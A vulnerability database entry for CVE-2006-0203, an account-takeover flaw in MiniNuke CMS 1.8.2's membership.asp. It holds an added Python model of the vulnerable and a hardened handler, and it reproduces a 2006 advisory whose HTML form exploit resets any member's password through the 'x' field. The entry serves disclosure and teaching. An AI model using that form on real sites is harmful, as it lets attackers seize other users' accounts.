Mini-Nuke CMS System 'membership.asp' Password Change Vulnerability

Vulnerability ID: 1196364
Vulnerability type: Input validation
Published: 2006-01-13
Updated: 2006-01-13
CVE ID: CVE-2006-0203
CNNVD-ID: CNNVD-200601-134
Platform: N/A
CVSS score: 5.0
|Vulnerability source
https://www.securityfocus.com/bid/88514
https://cxsecurity.com/issue/WLB-2006010032
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-134
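|Vulnerability details
membership.asp in Mini-Nuke CMS System 1.8.2 and earlier does not verify the old password when a password is changed, which allows remote attackers to change the passwords of other members via a lostpassnew action with a modified x parameter.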
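The flaw described above, modelled next to a hardened handler, as an added example that is not MiniNuke's own code (the real handler is Classic ASP). The `Members` store, the `token` form field and the 15-minute token lifetime are assumptions made for illustration; only `pass`, `passa` and `x` come from the advisory.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL = 900  # seconds a reset token stays valid (assumed policy)

def _pw_hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

class Members:
    """Hypothetical in-memory member store standing in for the CMS database."""
    def __init__(self):
        self.creds = {}    # member -> (salt, password hash)
        self.tokens = {}   # sha256(token) -> (member, expiry timestamp)

    def set_password(self, member, password):
        salt = secrets.token_bytes(16)
        self.creds[member] = (salt, _pw_hash(password, salt))

    def check_password(self, member, password):
        salt, stored = self.creds[member]
        return hmac.compare_digest(stored, _pw_hash(password, salt))

    def issue_reset_token(self, member):
        """Token is sent to the member's registered e-mail; only its hash is kept."""
        token = secrets.token_urlsafe(32)
        digest = hashlib.sha256(token.encode()).hexdigest()
        self.tokens[digest] = (member, time.time() + TOKEN_TTL)
        return token

def lostpassnew_vulnerable(db, form):
    # Behaviour the advisory describes: the target member is whatever "x" says.
    if form["pass"] != form["passa"]:
        return False
    db.set_password(form["x"], form["pass"])
    return True

def lostpassnew_hardened(db, form):
    # The member is taken from a single-use server-side token; "x" is ignored.
    if not form.get("pass") or form.get("pass") != form.get("passa"):
        return False
    digest = hashlib.sha256(form.get("token", "").encode()).hexdigest()
    member, expiry = db.tokens.pop(digest, (None, 0))
    if member is None or time.time() > expiry:
        return False
    db.set_password(member, form["pass"])
    return True
```

A password change made from a logged-in session would instead take the member from the session and require the old password via `check_password`.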
|Exploit (EXP)
--Security Report--
Advisory: MiniNuke CMS System <= 1.8.2 (membership.asp) remote user password
change exploit
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 12/01/06 08:49 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com [email concealed]
Web: http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About: Via this method a remote attacker can change any user's password without
login.
---
How&Example:
HTML Example
[code]
<html>
<title>MiniNuke <= 1.8.2 remote user password change</title>
<form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew">
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the
blanks</font></td></tr>
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password
</font></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD:
</font></td>
<td width="50%"><input type="text" name="pass" size="20"></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again :
</font></td>
<td width="50%"><input type="text" name="passa" size="20"><input type="text"
name="x" value="Membername">  
<input type="submit" value="Send" name="B1" style="font-family: Verdana;
font-size: 10px; border: 1px ridge #FFFFFF; background-color:
#FFFFFF"></td></tr>
</table></form>
</html>
[/code]
--
Regards,
 From the NWPX team,
nuker a.k.a nukedx
|Affected products
Mini-Nuke Cms System 1.8.2
|References

Source: XF
Name: mininuke-membership-change-password(24101)
Link: http://xforce.iss.net/xforce/xfdb/24101
Source: BUGTRAQ
Name: 20060113 Advisory: MiniNuke CMS System <= 1.8.2 (membership.asp) remote user password change exploit
Link: http://www.securityfocus.com/archive/1/archive/1/421748/100/0/threaded
Source: OSVDB
Name: 22385
Link: http://www.osvdb.org/22385
Source: VUPEN
Name: ADV-2006-0173
Link: http://www.frsirt.com/english/advisories/2006/0173
Source: SECUNIA
Name: 18439
Link: http://secunia.com/advisories/18439
Source: FULLDISC
Name: 20060112 Advisory: MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injection vulnerability
Link: http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0439.html
Source: FULLDISC
Name: 20060112 Advisory: MiniNuke CMS System <= 1.8.2 (membership.asp) remote user password change exploit
Link: http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0437.html
Source: BUGTRAQ
Name: 20060129 [xpl#2] MiniNuke 1.8.2 - change member's passwrod
Link: http://archives.neohapsis.com/archives/bugtraq/2006-01/0483.html
Source: SREASON
Name: 344
Link: http://securityreason.com/securit